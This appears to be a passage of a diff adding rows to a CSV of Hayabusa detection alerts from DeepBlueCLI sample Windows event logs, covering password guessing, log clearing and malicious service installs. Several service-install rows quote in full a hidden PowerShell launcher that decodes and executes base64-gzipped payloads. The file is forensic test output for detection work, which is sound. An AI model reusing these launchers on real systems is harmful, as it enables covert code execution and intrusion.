+2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KJRw0S82SupmuS4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z4lSo9BMWdcPLfLb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XreSLg472qhJw0R3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KIJcQJKLmnjrE2T9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zlddo3GCTEIkFyi9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hxiZoB5mHR2tGUFM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fpEbpiox2Q3Qf8av  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
